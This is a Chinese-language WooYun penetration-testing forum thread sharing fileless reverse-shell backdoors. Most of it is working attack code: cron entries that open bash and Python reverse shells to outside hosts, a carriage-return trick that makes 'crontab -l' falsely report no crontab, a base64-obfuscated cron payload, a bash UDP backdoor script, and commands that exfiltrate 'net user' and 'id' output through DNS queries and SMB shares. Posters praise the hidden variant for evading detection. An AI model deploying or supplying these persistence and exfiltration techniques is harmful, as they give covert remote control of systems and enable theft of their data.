当前位置:WooYun(白帽子技术社区) >> 渗透测试 >> 一条命令实现无文件兼容性强的反弹后门
最好用一个不常见的用户执行,任务写入/var/spool/cron/$username(crontab -l;echo '*/60 * * * * exec 9<> /dev/tcp/dns.wuyun.org/53;exec 0<&9;exec 1>&9 2>&1;/bin/bash --noprofile -i')|crontab -
升级猥琐版,crontab -l 直接提示no crontab for $username(crontab -l;printf "*/60 * * * * exec 9<> /dev/tcp/dns.wuyun.org/53;exec 0<&9;exec 1>&9 2>&1;/bin/bash --noprofile -i;\rno crontab for `whoami`%100c\n")|crontab -
60分钟反连一次,在未连接状态启动反连任务的时候,进程和端口都无状态-bash: connect: Connection refused
-bash: /dev/tcp/dns.wuyun.org/53: Connection refused
-bash: 9: Bad file descriptor
-bash: 9: Bad file descriptor
也就是说,你安装后,如果不连接成功,是很难被发现的。
-
bash udp反弹后门:
#!/bin/bash
exec 9<> /dev/udp/localhost/8080
[ $? -eq 1 ] && exit
echo "connect ok" >&9
while :
do
a=`dd bs=200 count=1 <&9 2>/dev/null`
if echo "$a"|grep "exit"; then break; fi
echo `$a` >&9
done
exec 9>&-
exec 9<&-
https://github.com/cloudsec/brootkit/blob/master/ubd.sh
-
@猪猪侠 这个隐藏版本确实学到了,湾湾orange吊吊的
-
exec 9<> /dev/tcp/localhost/8080&&exec 0<&9&&exec 1>&9 2>&1&&/bin/bash --noprofile -i
这样tcp连接不成功, 就不会继续执行bash了, 不然每隔1小时系统里就会多出一个/bin/bash -i的进程。
另外还可以把反弹后门用base64加密,运行时解密:*/1 * * * * a=`echo "ZXhlYyA5PD4gL2Rldi90Y3AvbG9jYWxob3N0LzgwODA7ZXhlYyAwPCY5O2V4ZWMgMT4mOSAyPiYxOy9iaW4vYmFzaCAtLW5vcHJvZmlsZSAtaQ=="|base64 -d`;/bin/bash -c "$a";unset a
更多关于bash的渗透技巧请访问:https://github.com/cloudsec/brootkit -
刚刚orange又教一招
printf "*/3 * * * * $CMD;\rno crontab for $USER%$((${#CMD}+10))c\n" | crontab -
-
//python版本,kali下面测试成功,tcp 8080:
(crontab -l;printf "*/5 * * * * /usr/bin/python -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect((\"192.168.1.153\",8080));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call([\"/bin/sh\",\"-i\"]);';\rno crontab for `whoami`%100c\n")|crontab - -
//python版本,kali下面测试成功,tcp 8080:
(crontab -l;printf "*/5 * * * * /usr/bin/python -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect((\"192.168.1.153\",8080));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call([\"/bin/sh\",\"-i\"]);';\rno crontab for `whoami`%100c\n")|crontab - -
net user | nslookup type=A 144.144.144.144
net user > \\ip\c$\xxx.txt
http://www.freebuf.com/articles/system/57183.html
http://paper.aliapp.com/md/dns.txtLINE=`id`; domain="yourdomain.com";while read -r -n 1 char;
do var+=$(printf "%X" \'$char\');done<<<$LINE;b=0;e=60;l=${#var};
while [ $b -lt $l ];do >& /dev/udp/$RANDOM.$b."${var:$b:$e}".
$domain/53 0>&1;let b=b+60;done;>& /dev/udp/$RANDOM.theend.$domain/53
0>&1;unset var;unset var2